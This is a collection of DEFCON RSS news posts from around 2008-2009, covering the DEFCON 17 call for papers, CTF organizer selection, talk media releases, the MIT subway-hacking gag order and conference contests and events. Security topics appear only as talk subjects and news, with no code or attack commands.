https://www.defcon.org/defconrss.xml DEFCON's very own Russ Rogers was interviewed on CNN about the con and the motivations behind the Conficker Worm. Check it out!

==> New Format for DEFCON 15 & 16 Archives!

https://www.defcon.org/defconrss.xml Check out the new format for the DEFCON Archives! DC15 and DC16 have been converted, and the rest are being ported over as we speak! The new format combines links to Presentations in audio & video, Media RSS feeds, Conference Programs, Press from the show, and more in to one easy page for each past DEFCON. DEFCON 16 Archive: https://www.defcon.org/html/links/dc-archives/dc-16-archive.html DEFCON 15 Archive: https://www.defcon.org/html/links/dc-archives/dc-15-archive.html Check 'em out!

==> Redesigned DEFCON Site Beta is Live!

https://www.defcon.org/defconrss.xml The DEFCON website has been given a fresh new face, designed to deliver relevant content, inspire interaction within the community, and be more mobile friendly. We've released this beta to get feedback from you, the user, as we begin to flesh out the new features. Take a look around, on different browsers and devices, and if you like, report any bugs or voice suggestions to <strong>neil [at] defcon ]dot[ org</strong>. We're adding a few new items to the site, restructuring and expanding the archives section, and highlighting community news and events. Keep your eyes on the DEFCON RSS, Forums, Twitter, and/or LinkedIn Group for announcements as these features are completed and implemented.

==> The new DEFCON 17 CTF Organizers have spoken

https://www.defcon.org/defconrss.xml The newly chosen organizers of this year's CTF competition, Diutinus Defense Technologies, Inc., have broken their silence on the DEFCON Forums. You can view the post at https://forum.defcon.org/showthread.php?t=10246&page=3. The have also posted a website at http://www.ddtek.biz

==> And the new DEFCON 17 CTF Organizer is...

https://www.defcon.org/defconrss.xml The fine authors of Proposal #1 on the DEFCON 17 CTF Submissions Thread. We are not at liberty to divulge much more than this at this time, but you can read DT's announcement and keep yor eyes peeled for new details at the aformentioned links!

==> Contest and Event Status for DEFCON 17

https://www.defcon.org/defconrss.xml It's going to be another great year of events and contests at DEFCON, the ideas are flying and some new players have emerged. A couple of new items for this year are DefCon 101: A Lurkers Guide to DefCon, and the DEFCON Geo Challenge. You can check out all of the latest contest and event info on the DEFCON 17 Official and Unofficial Events and Contests Forum.

==> DEFCON 17 CTF Proposals On the Forums!

https://www.defcon.org/defconrss.xml DT has sanitized and posted the CTF Proposal submissions on the DEFCON Forums at https://forum.defcon.org/showthread.php?t=10246 to be viewed and commented on by the community. Check them out and weigh in on which one you think should be chosen for 2009!

==> DEFCON 16 Audio now available!

https://www.defcon.org/defconrss.xml I've started to upload all the audio and video from DEFCON 16! This year we are offering something new, a combo video file that has both the slides as well as the video of the speaker on the same screen. These files are big! If you just want to listen to a talk I suggest downloading the m4b audio files.. they are 1/2 the size of years past and will easily fit on your phone.. about 5 to 10 megs each. Audio files have finished uploading! https://www.defcon.org/podcast/defcon-16-audio.rss Video of just the presentation slides with audio are uploading now, should take a day or so to be available, then the combo video files will be uploaded. Let the leeching begin! Report any problems on this forum thread. The Dark Tangent

==> Submissions for CTF Organizers ends this weekend!

https://www.defcon.org/defconrss.xml Just a friendly reminder, if your group wants to set the bar to take the fame, and the massive challenge of being the next Capture the Flag Organizers for DEFCON, you must get your submissions in by this weekend! Good Luck! This thread on the DEFCON Forums has all the details!

==> DEFCON 17 Call For Papers is Open!

https://www.defcon.org/defconrss.xml xxxxxxxxxxxxxxxxxx xxx xx x xx DEF CON 17, Las Vegas 2009 xxxxxxxXXXXxxxxxxxxxxxxx xx x x July 31st - August 2nd xxxxxxXXXXXXxxxxx x x x The Rivera Hotel and Casino xxxxxXXXXXXXXxxxxx xx x x Las Vegas, Nevada, USA xxxxXXXXXXXXXXxxx x xxxxxxxx x https://www.defcon.org/ xxxXXXXXXXXXXXXxxxxxxxxxx x xxXXXXXXXXXXXXXXxxxxxx xx x Call for Papers Call for Papers xxxXXXXXXXXXXXXxxxxxxxx Call for Papers Call for Papers xxxxXXXXXXXXXXxxxxxxxx x x xx Call for Papers Call for Papers xxxxxXXXXXXXXxxxxxxx xxx xx x Call for Papers Call for Papers xxxxxxXXXXXXxxxxxxx x x x Call for Papers Call for Papers xxxxxxxXXXXxxxxxxxxxxx xx x x Call for Papers Call for Papers xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx x Call for Papers Call for Papers Dark monks of techno-fu, it is that time of the year again! The DEFCON CFP is now open! What: DEFCON 17 Call For Papers When: The Call for Papers will close on May 15, 2009 How: Complete the Call for Papers Form and send to talks at defcon dot org Don't know what DEFCON is? Go to www.defcon.org and clue up! Papers and presentations are now being accepted for DEFCON 17, the conference your mother and ISC(2) warned you about. DEFCON will take place at the Riviera in Las Vegas, NV, USA, July 31 - August 2, 2009. Two years ago we eliminated specific speaking tracks and we received a diverse selection of submissions. From hacking your car, your brain, and CIA sculptures to hacking the vote, Bluetooth, and DNS hacks. We will group presentations by subjects and come up with topic clusters of interest. It worked out so well in the past we are doing it again this year. What are we looking for then, if we don't have tracks? Were looking for the presentation that you've never seen before and have always wanted to see. We are looking for the presentation that the attendees wouldn't ask for, but blows their minds when they see it. We want strange demos of Personal GPS jammers, RFID zappers, and HERF madness. Got a MITM attack against cell phones? We want to see it. Subjects that we have traditionally covered in the past, and will continue to accept include: Trojan development, worms, malware, intelligent agents, protocol exploits, application security, web security, database hacking, privacy issues, criminal law, civil law, international law/treaties, prosecution perspectives, 802.11X, bluetooth, cellular telephony protocols, privacy, identity theft, identity creation, fraud, social implications of technology, media/film presentations, firmware hacking, hardware hacking, embedded systems hacking, smartcard technologies, credit card and financial instrument technologies, surveillance, counter-surveillance, UFO's, peer2peer technologies, reputation systems, copyright infringement and anti-copyright infringement enforcement technologies, critical infrastructure issues, physical security, social engineering, academic security research, PDA and cell phone security, EMP/HERF weaponry, TEMPEST technologies, corporate espionage, IDS evasion. What a mouth full! Well you can't say we didn't give you some ideas. This list is not intended to limit possible topics, merely to give examples of topics that have interested us in the past, and is in fact the same list we used last year.. Check out https://www.defcon.org/html/defcon-16/dc-16-speakers.html for past conference presentations to get a complete list of past topics that were accepted if you want to learn from the past. We are looking for and give preference to: unique research, new tool releases, -day attacks (with responsible disclosure), highly technical material, social commentaries, and ground breaking material of any kind. Want to screen a new hacking documentary or release research? Consider DEFCON. Speaking Formats: Choose between 12 hundred seconds, 50 minutes, 110 minutes, 1/2 day Thursday or a break out format of a length you determine. We are continuing the Twelve Hundred Second Spotlight, which is a shorter presentation (about twenty minutes) that doesn't warrant a full 50 or 110 minute talk. The Twelve Hundred Second Spotlight is designed for those who don't have enough material for a full talk, but still have a valuable contribution to make. This is to ensure that great ideas that can be presented quickly don't fall through the cracks merely because they didn't justify a full length talk. Examples include research, announcements, group presentations, projects needing volunteers or testers, requests for comments, updates on previously given talks, quick demonstrations. You get the idea. Presenters will get a speaker badge which entitles them to free admittance to DEFCON, but we will be unable to pay an Honorarium. Remember being attacked by Gran Master Ratt's Flame Crotch? Do you remember thick accented Germans trying to convince you to attack critical infrastructure? Do you remember extravagant vapor ware releases by a stage filled with posses? We do, and sans projectiles of raw meat we want to encourage such shenanigans again this year. We are calling on all "hacker groups" (you know who you are, and the FBI has a nifty file with your name on it) to present at DEFCON, to discuss what you're up to, what your mission is, to discuss any upcoming or past projects, and to discuss parties/conferences you are throwing. We do humbly request that all gang warfare be relegated to electronic attacks, and not fall over into meat space. New for DEFCON 17: NEW this year is a 1/2 day set of tracks on Thursday, pre-con, to help orient newbies and provide 1/2 day training on different 'foundational' subjects such as networking, building custom Linux distros, a work shop on modding your PSP, the fundamentals of radio, things like that. These sessions will get you in the mood for the main conference and give you something to do if you showed up early Thursday. As such your submissions for the Thursday sessions should be entertaining and help attendees who are fairly new get their feet under themselves, or give more advances hacker types a half day of fun gutting their TiVo. If you want to present a 1/2 day training or newbie talk just make sure you mark down you want to present on Thursday. We have ALL the speaking rooms this year, and because of this I want to announce a call for workshops, demos, and mini trainings. We have additional small rooms that will enable highly focused demonstrations or workshops. If you want to talk about building a passport cloner or a tutorial on developing Metasploit exploits this might be the format for you. You tell us how much time you need, and we try to accommodate you! To submit a speech: Complete the DEFCON 17 Call for Papers Form. We are going to continue last year's goal of increasing the quality of the talks by screening people and topics. I realize you guys are speaking for basically free, but some talks are better than others. Some people put in a bit more effort than others. I want to reward the people who do the work by making sure there is room for them. This year we will have two rounds of speaker acceptance. In the first round we will fill about half of the schedule before the submission deadline, and the remaining half afterwards. This is to encourage people to submit as early as possible and allows attendees to plan on the topics that interest them. If you see the schedule on-line start to fill, do not worry if you have not heard from us yet, as we are still in the process of selection. Barring a disaster of monstrous proportions, speaker selection will be completed no later July 1. The sooner you submit the better chance you have of the reviewers to give your presentation the full consideration it warrants. If you wait until the last minute to submit, you have less of a chance of being selected. After a completed CFP form is received, speakers will be contacted if there are any questions about their presentations. If your talk is accepted you can continue to modify and evolve it up until the last minute, but don't deviate from your accepted presentation. We will mail you with information on deadlines for when we need your presentation, to be burnt on the CDROM, as well as information for the printed program. Speakers get in to the show free, get paid (AFTER they give a good presentation!), get a coolio badge, and people like you more. Heck, most people find it is a great way to meet people or find other people interested in their topics. Speakers can opt to forgo their payment and instead receive three human badges that they can give to their friends, sell to strangers, or hold onto as timeless mementoes. Receiving badges instead of checks has been a popular option for those insisting on maintaining their anonymity. Please visit: https://www.defcon.org/ for previous conference archives, information, and speeches. Updated announcements will be posted to news groups, security mailing lists and this web site. https://forum.defcon.org/ for a look at all the events and contests being planned for DEFCON 17. Join in on the action. https://pics.defcon.org/ to upload all your past DEFCON pictures. We store the pictures so you don't have to worry about web space. If you have an account on the forums, you have an account here. https://www.defcon.org/defconrss.xml for news and announcements surrounding DEFCON. CFP forms and questions should get mailed to: talks/at/defcon.org

==> Call for DEFCON 17 Capture the Flag Organizers!

https://www.defcon.org/defconrss.xml WANTED: An evil large multinational corporation, or... A nefarious group of genius autonomous hackers, or... A shadowy government organization from somewhere in the world TO: Host, recreate, and innovate the worlds most (in)famous hacking contest. WHY: For everlasting fame, intrusive media interviews, the respect of your peers, or the envy of your enemies. Do you have what it takes and know what we're talking about? Go to https://forum.defcon.org/showthread.php?t=10130 for all the details!

==> Call for Updates: Unofficial DEFCON FAQ

https://www.defcon.org/defconrss.xml From HighWiz on the DEFCON Blogs: The original "Unofficial DefCon FAQ" wasn't the work of one single individual but a collaboration by many people. I view my role as more of an organizer of the information rather than the creator of it. Version 1.0 is seriously outdated, http://defcon.stotan.org/faq/ and in need of a refresh. So I figured I'd utilize this blog space to request feedback on version 2.0 . To find out more and how to contribute, got to https://forum.defcon.org/blog.php?b=101

==> DEFCON Forums Now SSL Only

https://www.defcon.org/defconrss.xml Due to overwhelming feed back for the positive, the DEFCON Forums are now strictly SSL. This change has enabled us to utilize page compression which was previously unavailable, which speeds up page delivery. It will also enhance security, since the all sessions will now be encrypted. If you haven't already joined the DEFCON Forums, you should, it's a great place to keep in touch with the DEFCON community and to be a part of the discussion and planning leading up to the next DEFCON! Check it out at: forum.defcon.org

==> Subway Hackers Now Working with MBTA

https://www.defcon.org/defconrss.xml Well the dust has settled, and the lawsuit against three MIT students, who were to speak at DEFCON 16 about vulnerabilities in the Boston subway ticketing system, has been dropped. It seems now they will be working with the MBTA to help secure the ticketing systems. The researchers, who were federally gagged from speaking at DEFCON, were represented by the EFF and the gag order was dropped shortly after con. you can read the EFF Press release at http://www.eff.org/press/archives/2008/12/22, and there is an article on the PCWorld site at http://www.pcworld.com/article/155903/with_lawsuit_settled_hackers_now_working_with_mbta.html

==> Order DEFCON 16 Presentation DVDs From The Source of Knowledge

https://www.defcon.org/defconrss.xml If you didn't make it out to DEFCON 16, or just wanted to refresh on some of the great presentations we had this year, you can order full DVD copies of all of the talks from The Source of Knowledge (TSOK) website. TSOK's SynchVue DVD Format is new and improved, combining video and audio of the speaker, as well as slide material in one! From TSOK website: SynchVue DVD-ROM + SessionVue Audio The SynchVue DVD-ROM is an incredible product which merges the live audio with the projected image. Whether it is a PowerPoint presentation, software demonstration, video or web page, all of it is captured and synchronized seamlessly with the audio from the presenter. Check it out at: https://www.sok-media.com/store/products.php?event=2008-DEFCON

==> Poll: Should DEFCON Forums go SSL Only?

https://www.defcon.org/defconrss.xml Get over to the DEFCON Forums and weigh in on whether or not they should only be accessible over an SSL connection. If you are a forums member, there is a handy poll in which you can vote. If you're not a member, SIGN UP! From DT on the DEFCON Forums: Hey everyone, I'd like everyone's input on switching forum.defcon.org over to SSL only. Brief background: The way we do redirection from http to https is a clever kludge Cot came up with, but it prevents us from using http compression, which would speed things up for everyone. Now that mobile devices have supported http compression for years we may as well take advantage of it, not to mention it would be like getting extra free capacity. With SSL only some of the XSS and related attacks would be more difficult and MITM concerns would almost vanish. The downside is some people might not be able to log in through proxies (I can over Tor, though), at free WiFi locations, etc. https://forum.defcon.org/showthread.php?t=9967

==> Defcon.org is Being Remodeled!

https://www.defcon.org/defconrss.xml It's all behind the scenes of course, but defcon.org is currently being re-worked a bit to enhance the community aspect of the site, refresh some of the older content, and become more mobile friendly. Keep an eye out over the next several weeks for changes and enhancements to the site!

==> Remaining DEFCON 16 Swag available at J!NX

https://www.defcon.org/defconrss.xml For those of you that couldn't make it to this year's DEFCON, or just didn't get a chance to stop by the Swag Booth, the remainder of this year's swag can now be purchased from J!NX. Check out the available styles at http://www.jinx.com/def_con?tcid=1, but hurry, sizes and styles are limited!

==> DEFCON Speakers in the News

https://www.defcon.org/defconrss.xml Tony Kapela, who blew minds by using flaws in BGP to intercept and re-route all of the DEFCON 16 network traffic, is the featured speaker at Black Hat's fourth free webcast. the webcast is entitled "Trust Doesn't Scale - Practical Hijacking on the World's Largest Network. It promises to be an interesting presentation. To find out more, go to https://www.blackhat.com/html/webinars/practicalhijacking.html. To register, you can go to http://w.on24.com/r.htm?e=115053&s=1&k=526FB59D2232E5EE4DF1A158DEA07277. The webcast will begin Thursday, October 16 at 1pm PST.

==> DEFCON Badge Designer Joe Grand's TV Show Premiers Wednesday Oct. 15!

https://www.defcon.org/defconrss.xml As many of you may know, the unique electronic badges for DEFCON (since DC14) are designed by the illustrious Joe "Kingpin" Grand. Formerly a member of the hacker group L0pht Heavy Industries and currently the brain behind Grand Idea Studios and The Kingpin Empire, Joe also has a new TV show called "Prototype This" premiering this Wednesday, October 15th on the Discovery Channel at 10pm eastern time. The premise -- A team of four super smart guys with varying electronics and engineering backgrounds come up with and prototype crazy one-of-a-kind inventions on the cutting edge of technology in a limited time frame. It seems like this could be a great introduction for many into the world of hardware hacking and design. We're looking forward to see what they come up with! Upcoming Episode List: MIND CONTROLLED CAR - October 15 @ 10 e/p BOXING ROBOTS - October 22 @ 10 e/p TRAFFIC BUSTING TRUCK - October 29 @ 10 e/p GET UP AND GO - November 5 @ 10 e/p WATERSLIDE SIMULATOR - November 12 @ 10 e/p SIX-LEGGED ALL TERRAIN VEHICLE - November 19 @ 10 e/p Some links about the show: http://dsc.discovery.com/tv/prototype-this/prototype-this.html - Discovery Channel Page for Prototype This http://en.wikipedia.org/wiki/Prototype_This - Wikipedia Entry http://news.cnet.com/8301-13772_3-10016485-52.html - CNet News Article

==> Early Release Video from DEFCON 16! Tool from talk released!

https://www.defcon.org/defconrss.xml We've decided to do an early release of a few of the news-making presentations from DEFCON 16 in video format! The following links are in two formats, the h.264 version is an iPod compatible version of the presenter's slides with audio of the speech, and the full .mov is quicktime with dual video of the speaker and the slides. Enjoy, and keep your eye out for all the videos and audio from DEFCON 16 to be released in the next couple months! Brenno De Winter - Ticket to Trouble media.defcon.org/dc-16/video/dc16_dewinter_tickettotrouble/dc16_dewinter_tickettotrouble_full.mov media.defcon.org/dc-16/video/dc16_dewinter_tickettotrouble/dc16_dewinter_tickettotrouble.m4v Dan Kaminsky - DNS Goodness media.defcon.org/dc-16/video/dc16_kaminsky/dc16_kaminsky_cache_full.mov media.defcon.org/dc-16/video/dc16_kaminsky/dc16_kaminsky_cache.m4v Anton Kapela and Alex Pilosov - Stealing the Internet media.defcon.org/dc-16/video/dc16_kapela-pilosov_stealing/dc16_kapela-pilosov_full.mov media.defcon.org/dc-16/video/dc16_kapela-pilosov_stealing/dc16_kapela-pilosov.m4v Mike Perry - 365 Day: Active HTTPS Cookie Hijacking media.defcon.org/dc-16/video/dc16_perry_TOR/dc16_perrry_TOR_full.mov media.defcon.org/dc-16/video/dc16_perry_TOR/dc16_perrry_TOR.m4v Coincidentally, Slashdot reports that Mike Perry has released the tool from this talk today. you can find the article here: http://it.slashdot.org/it/08/09/09/1558218.shtml

==> DEFCON 16 Press Page Updated

https://www.defcon.org/defconrss.xml There were many press-worthy happenings at DEFCON 16 this year, from the MBTA controversy to the New way of expoiting BGP. We've collected many of the articles for you to peruse on the Past Media Coverage page. You can check it out at https://www.defcon.org/html/links/dc_press/dc_press.html. If you've noticed an article directly related to to DEFCON 16 we might have missed, send the url to neil ]at[ defcon {dot} org and we'll post it.

==> BGP exploit causing quite a stir

https://www.defcon.org/defconrss.xml Although it has been known for over a decade, an exploit of the Border Gateway Protocol (BGP) recently re-entered the spotlight at DEFCON 16 in a presentation by Anton Kapela and Alex Pilosov. The presentation is entitled "Stealing The Internet - A Routed, Wide-area, Man in the Middle Attack ". You can read about the exploit on the Wired Threat level blog at http://blog.wired.com/27bstroke6/2008/08/revealed-the-in.html and you can download the slides from the presentation at https://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-pilosov-kapela.pdf

==> DEFCON 16 Presentations now online!

https://www.defcon.org/defconrss.xml Lose your DEFCON 16 CD? Looking for updated presentation materials? Did you just miss DEFCON 16 altogether? You're in luck! The presentation slides and extras from the DEFCON 16 CD, including updated presentations we have received thus far can now be downloaded on the DEFCON Media Archives page. Go to https://www.defcon.org/html/links/defcon-media-archives.html for all the goodies!

==> First Interview since silenced subway hacking talk

https://www.defcon.org/defconrss.xml Popular Mechanics has interviewed Zack Anderson, one of the silenced MIT Students who were to give the Anatomy of a Subway Hack talk at DEFCON 16. From Popular Mechanics: Its rare that a hacker convention makes national news, but three MIT students caused a whole lot of controversy when they planned a presentation about security holes in Boston's subway system for DefCon in Las Vegas earlier this month. They were forced to cancel the talk at the last minute by a 10-day federal restraining order, requested by Boston's Massachusetts Bay Transit Authority (MBTA). On Tuesday, a judge denied motions by the MBTA to issue a preliminary injunction aimed at keeping the students quiet for a further five months. Now, in his most extensive interview to date, MIT subway hacker Zack Anderson talks with PM about what's wrong with the Charlie Card, what happened at DefCon, and what it's like to tango with the FBI and the MBTA. Read more at: http://www.popularmechanics.com/technology/industry/4278892.html?page=1

==> MIT students gag order lifted!

https://www.defcon.org/defconrss.xml From CNET.com: BOSTON--The three Massachusetts Institute of Technology students who have been barred by a court order from discussing subway card vulnerabilities are now free to say what they want. In a ruling certain to be cheered by computer researchers, a federal judge here Tuesday let the 10-day-old gag order expire. U.S. District Judge George O'Toole Jr. refused to grant a preliminary injunction requested by the Massachusetts Bay Transportation Authority that would have blocked the students from talking about their findings until January 1, 2009. The MBTA's requested injunction would have replaced a temporary restraining order granted during the Defcon hacker conference, which under federal court rules automatically expires on Tuesday. Read more at: http://news.cnet.com/8301-1009_3-10020252-83.html?hhTest=1

==> Post DEFCON 16 items of note

https://www.defcon.org/defconrss.xml DEFCON 16 Receipt! For those of you that need a receipt for attending DEFCON 16, it can be downloaded from here: https://www.defcon.org/images/defcon-16/dc16_receipt.pdf Upload your Photos! Now that con has ended, get on over to pics.defcon.org and upload all of your awesome pics and videos from the show! We want to see them!

==> New Talk: Ticket to Trouble

https://www.defcon.org/defconrss.xml Brenno De Winter will be speaking Sunday on controversy surrounding hacks of the Belgian Subway system. The presentation will occur 13:00 to 13:50 in Track 3.

==> DEFCON 16 NEWS: MIT Students Gagged by Federal Court Judge

https://www.defcon.org/defconrss.xml The EFF Announced today that they will represent 3 MIT students who were set to present at DEFCON 16 on Mass transit vulnerablities. The students were forced to cancel their presentation on Sunday, due to a Federal Court Judge's Order. From eff.org: MIT Students Gagged by Federal Court Judge EFF Backs Researchers Forced to Cancel Presentation on Transit Fare Payment System Las Vegas - Three students at the Massachusetts Institute of Technology (MIT) were ordered this morning by a federal court judge to cancel their scheduled presentation about vulnerabilities in Boston's transit fare payment system, violating their First Amendment right to discuss their important research. (read more at: http://www.eff.org/press/archives/2008/08/09 To see what other press is happening at DEFCON 16, check out the DEFCON in the news thread at https://forum.defcon.org/showthread.php?p=98012#post98012

==> DEFCON Updates

https://www.defcon.org/defconrss.xml DEFCON 16 Capture the Flag is Coming! In just a couple of days, the ultimate battle will begin at DEFCON 16. That's right, we're talking about the DEFCON Capture the Flag Competition organized by Kenshoto! Eight Teams will unleash their best root-fu in the struggle for the coveted CTF Title! The Following teams will be competing. 1@stPlace (returning champions) Routards Pandas with Gambas Guard@MyLan0 Shellphish Taekwon-V WOWHACKER PLUS 4800 Head into CTF Room in Royale Pavilion to Check out the action! New Talk Added: Toying with Barcodes By Felix "FX" Lindner on Saturday at 17:00 in Track 1. Check it out at: https://www.defcon.org/html/defcon-16/dc-16-speakers.html#FX2

==> Don't Miss the TCP/IP Drinking Game!

https://www.defcon.org/defconrss.xml The annual must-see Defcon event of BGP, booze, and bemusement returns in this year's TCP/IP Drinking Game. Panelists will pit their trivia knowledge of network trivia against one another and the ever-present haze of inebriation for all to see. We promise that no RFC nor hepatic system will be spared. As always, solid audience participation is encouraged, so bring well-researched queries.* This year's event will be hosted by Adam J. O'Donnell, security researcher and provocateur. The usual M.C. of the TCP/IP drinking game, Dr. Mudge, is spending this year sober for tax purposes... see you next year with my new bionic liver :) ..mudge * Anyone asking about Windows 98 TCP/IP UIs will be promptly ejected. Friday @ 20:00 in Speaking Track 4

==> Stay in the loop with the DEFCON 16 Twitter feed!

https://www.defcon.org/defconrss.xml The vehicle of choice this year for up to the minute updates of breaking DEFCON news, announcements and so forth will be the DEFCON 16 Twitter feed. Sign up now at http://twitter.com and follow user defcon16 to keep up to date with this year's DEFCON! See news breaking? Send events of note at DEFCON 16 to defconupdates {at} gmail ]dot[ com so we can tell the world!

==> New Happenings at DEFCON 16

https://www.defcon.org/defconrss.xml Well folks, the time for the 16th installment of the hacking convention known as DEFCON draws near, and this year promises to be a great one! We've got more content than ever, including 5 full tracks of talks, demos, workshops, new contests, a new Hardware Hacking Village, and even a new EFF fundraiser to replace the dunk tank! Here is some of the goodness you can expect: DAVIX Visualization Workshop At this "Bring Your Own Laptop" workshop we will introduce you to DAVIX. The workshop starts with an introduction to the set of available tools, the integrated manual, as well as customizing the CD to your needs. In a second part, you can use DAVIX to analyze a set of provided packet captures. In the end we will show some of the visualizations created by the participants. Be prepared for pretty and meaningful pictures! Get more info at: https://forum.defcon.org/forumdisplay.php?f=425 Mobile Hacker Spaces Interested in visiting a Colorado Hacker Space here at DefCon 16? Check out the first ever Mobile Hacker Space, which will be parked in the outside chill out area during the convention. Try your hand against one of the challenges in the pentest lab, or learn from the web-based tutorials posted on the open network. Participation is encouraged, and presentations will be given every day from 2-4pm, which will provide a more hands-on look at how the Mobile Hacker Space operates and fits within published hacker space design patterns. Make sure you also attend the presentation on the history and design of the Colorado Springs Mobile Hacking Space on Sunday, at 1pm in Track One. Forums link: https://forum.defcon.org/forumdisplay.php?f=428 Quantum Spookshow Quantum mechanics make possible some things that are impossible in the "classical" world of ordinary experience, and which even seem to contradict common sense. Some of these spooky effects are coming into practical use in security applications. The Quantum Spookshow of the National Institute of Standards and Technology (NIST) and the National University of Singapore (NUS) demonstrates quantum cryptography and quantum entanglement on a four-node quantum network, which supports quantum encrypted streaming video and violations of local realism. Participants are encouraged to interact with the light beams that constitute the physical link of this network, and to meet physicists who have designed and built quantum networks. Quantum mechanics provides methods of encryption that are secure from eavesdropping attacks against the quantum channel, but in any actual system there are points of vulnerability, e.g. correlations of classical noise in the operation of quantum elements. Participants will have a chance to discover vulnerabilities by hands-on interaction with our systems. Hours: 10:00-18:00 on Friday and Saturday with Sunday, closing around 16:00 Location: 114. Directly across from the Contest area. EFF Fundraiser This year we decided to replace our beloved Dunk Tank with something NEW! Hackers and Guns in Las Vegas Ya gotta love it. You've seen it played out numerous times in movies and on TV. A flash bang grenade goes off. SWAT kicks in the door and moves quickly to differentiate between the good guys and the bad guys in the same room. How do they train to effectively recognize and take out the bad guys, while not wasting any of the hostages? One of the tools they use is a Firearms training Simulator or FATS system and someone was foolish enough to let us get our hands on one for DEFCON 16. So Calling all Shooters, FPS Gamers, Psycho Killers, and 1337 wannabes. Come on by and pop a cap in someones VR bleep. We will be set up in room 115 across from the contest area and next door to the Quantum Spookshow from 10:00 20:00. See if you got the skillz to make it through the challenges unscathed. Then the next time you hear a knock at your door in the middle of the night - you'll be ready. More at: https://forum.defcon.org/forumdisplay.php?f=427

==> WarBallooning Demo at DEFCON 16!

https://www.defcon.org/defconrss.xml A WarBalloon, er... Airborne Surveillance & 802.11 Stumbling Platform, also known as the "Kismet Eye in the Sky" will be flying just outside the DEFCON convention center on FRI and SAT from 11AM - 2 PM. DEFCON Attendees: please note the Balloon & Electronics launch will occur Daily at 11:00 AM & several times during the day as we change antenna's & recon. new targets. Read more at: https://forum.defcon.org/showthread.php?t=9613

==> The DEFCON Shoot is Back!

https://www.defcon.org/defconrss.xml From the DEFCON Shoot Page on Deviating.net: The DEFCON Shoot is a public event happening just prior to the DEFCON hacker conference in Las Vegas, Nevada. Anyone who wants to can show up and for a small fee make use of a private range located about 30 minutes outside of the city. There will be opportunities to see and possibly shoot some of the weapons belonging to your friends and it will also be possible to rent firearms (including Class-III full autos) from the range itself. In addition to having a number of terrific pieces of hardware on-site, the range is directly affiliated with Small Arms Review Magazine and thus has access to their nearly limitless archive of equipment. Anything from a WWII Bren Gun to a Vulcan Cannon-style Minigun is possible. As of right now, the event's ability to come off is contingent on participation... that means that we need you if we're going to make it happen. I have run the numbers, and I can acquire us private range time at a very sweet facility if we have about a little over two dozen people showing up, provided that about at least ten of them are interested in some full-automatic action. Read on for more details about location, pricing, etc. You can sign up on the DEFCON Forums at https://forum.defcon.org/showthread.php?t=9574 You can get all the info at http://deviating.net/firearms/defcon_shoot/

==> DEFCON 16 Contest & Events Update!

https://www.defcon.org/defconrss.xml New DEFCON 16 Events/Contests There are few new happenings recently added to the mix that you might want to know about, such as the EEE PC Mod workshop, The Leetskills Talent Competition, as well as Buzzword Survivor, where you can win your share of $10k! Get all the up to the minute info athttps://forum.defcon.org/forumdisplay.php?f=346! DEFCON 16 Black & White Ball: Acts Announced Get ready for some hot DJ action kids! Zziks has posted a tentative lineup for the Black & White bleep and Daytime Chillout Area. Check them out as they evolve on the Forums at https://forum.defcon.org/showthread.php?t=9533!

==> Mystery Box Wildcard Slot

https://www.defcon.org/defconrss.xml There will be one wildcard (walk-on) team allowed this year. Each year I have people asking about the contest after it is too late. This is my means of dealing with those people. Keep in mind that the first year Mystery Challenge ran a walk-on team won the competition. Friday morning I will be accepting intentions to compete. THIS MAY CHANGE TO THURSDAY NIGHT. If only one team shows for this position, it is theirs. If multiple teams show, there will be a mini-challenge race to determine who gets the spot. Anyone who intends to try for the walk on team should email me their intentions prior to con if possible. (DC16MysteryChallenge [at] MysteryChallenge ]dot[ org. This will help me gauge the magnitude of the mini-challenge race, if necessary (and it just helps me get an idea of the number trying out). See you all in a few weeks. LosT

==> Seeking Contestants! Win your share of 10K!

https://www.defcon.org/defconrss.xml The wait is over. Buzzword survivor is here. The rules are simple, the money is real. Rules: You sit and listen to 36 hours of straight vendor pitches - No sleeping - Eat what you want - Bathroom breaks when you need them - Stand and stretch when you need to, but you have to stay focused on the presenter. Prize: - 10 contestants - Half the pot gets divided by all remaining contestants at the end. - Half the pot get divided 60, 30, 10 by 1st, 2nd, 3rd in test scores. Prizes as of June 1, 2008 (assuming all 10 make it to the end). Pot could rise depending on number of sponsors. - 1st: $3500 - 2nd: $1500 - 3rd: $750 - All others: $500 To become a contestant email: buzzwordsurvivor@gmail.com

==> Mystery Challenge registration closed

https://www.defcon.org/defconrss.xml Mystery Challenge registration is now closed. There will be 1 wildcard team allowed to sign up the first day of Defcon. Should multiple teams desire this position, there will be a mini-contest. Interested parties should email LosT with their intent to try for the wildcard slot.

==> DEFCON 16 Schedule now on-line!

https://www.defcon.org/defconrss.xml DEFCON 16 Schedule now on-line! We are proud to present the schedule of speakers and events for DEFCON 16! Thanks to all the new space available at the Riviera Hotel & Casino, we have even more room this year. 4 Full speaking tracks and an additional "Breakout" track filled with cool talks, demonstrations and workshops. We are pleased at our lineup, and the amazing list of speakers who really diversified the content this year. Link: http://defcon.org/html/defcon-16/dc-16-schedule.html Keep checking the website and schedule for changes, Contests & Event Schedules and Workshop room locations. This year is packed with more stuff to enjoy than any years prior and we hope you like it just as much as we do! See you at the show!

==> Mystery Challenge Reg Closing Sunday 6/29

https://www.defcon.org/defconrss.xml Mystery Challenge Registration will close this Sunday (6/29/08) at 11:59:59 PM. If you intend to register do it now. There should be sufficient information in the forums and on MysteryChallenge.org at this point. 1057

==> DEFCON Badge Hacking Contest!

https://www.defcon.org/defconrss.xml Recently announced at the DEFCON forums: The DEFCON Badge Hacking Contest awards the top 3 most ingenious, obscure, mischievous, obscene, or technologically astounding badge modifications created over the weekend. No longer just a boring piece of passive material, the badge is now a full-featured, active electronic product, and it exists for your hacking pleasure. We've had some amazing hacks in previous years. For info on the past badges and badge hacking contest entries, check out: http://www.grandideastudio.com/portf...fcon-15-badge/http://www.grandideastudio.com/portf...fcon-14-badge/ This is the first year that it will be an official contest announced in advance, etc., as previously we've kept the whole thing under wraps until the first day of the con. For more info go to https://forum.defcon.org/showthread.php?t=9502

==> People's Choice voting is open for the DC16 Artwork Contest!

https://www.defcon.org/defconrss.xml Let the voting commence! Go to the DEFCON 16 Artwork Contest Public Gallery at https://pics.defcon.org/showgallery.php?cat=532&ppuser=16770 to view this year's submissions. Once you have found your favorite go ahead and cast your vote at: https://forum.defcon.org/showthread.php?t=9497. Voting for the People's Choice category will run for one week, ending June 30th at 6pm. You will need a DEFCON Forums account to vote, so if you don't have one, sign up now at forum.defcon.org

